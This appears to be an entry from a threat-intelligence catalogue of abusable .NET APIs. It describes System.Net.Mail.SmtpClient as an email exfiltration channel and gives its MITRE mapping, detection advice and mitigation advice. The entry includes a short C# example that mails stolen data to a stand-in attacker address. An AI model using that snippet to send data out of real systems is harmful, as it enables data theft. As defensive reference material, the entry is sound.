LOLAPI
Back to API Browser

System.Net.Mail.SmtpClient

⚠️ High Risk📁 Windows Dotnet Api🏷️ command and-control✅ Verified
#windows-dotnet-api#c2#exfiltration

🔧 API Details

Namespace

System.Net.Mail

Language

.NET 2.0+

Class

SmtpClient

Official Documentation

https://learn.microsoft.com/en-us/dotnet/api/system.net.mail.smtpclient

📊 Risk Assessment

Severity

High

Prevalence

low

Ease of Abuse

easy

Likelihood in Real Attacks

30%

🎯 MITRE ATT&CK Techniques

T1048.003

Click to view on MITRE ATT&CK

Abuse Scenarios

Email-based C2 exfiltration

Technique: T1048.003

Use SMTP to send stolen data via email

Code Example:

SmtpClient client = new SmtpClient("mail.server.com");
MailMessage msg = new MailMessage("attacker@domain.com", "attacker@domain.com");
msg.Body = exfiltrated_data;
client.Send(msg);
Detection Difficulty: Medium

🔍 Detection Strategies

Network IDS

HIGH Effectiveness

Monitor for SMTP connections from unusual processes

Proxy logs

HIGH Effectiveness

Detect SMTP connections to external mail servers

🛡️ Mitigation Strategies

policy

HIGH Feasibility

Block external SMTP connections

🕵️ Threat Intelligence

👥 APT Groups / Threat Actors

Scattered

🦠 Malware Families

Custom malware

🔨 Tools

Custom scripts

📋 Metadata

API ID

d22f4260-47ed-45e0-b3ed-645f2bece400

Created

2026-02-02

Author

Claw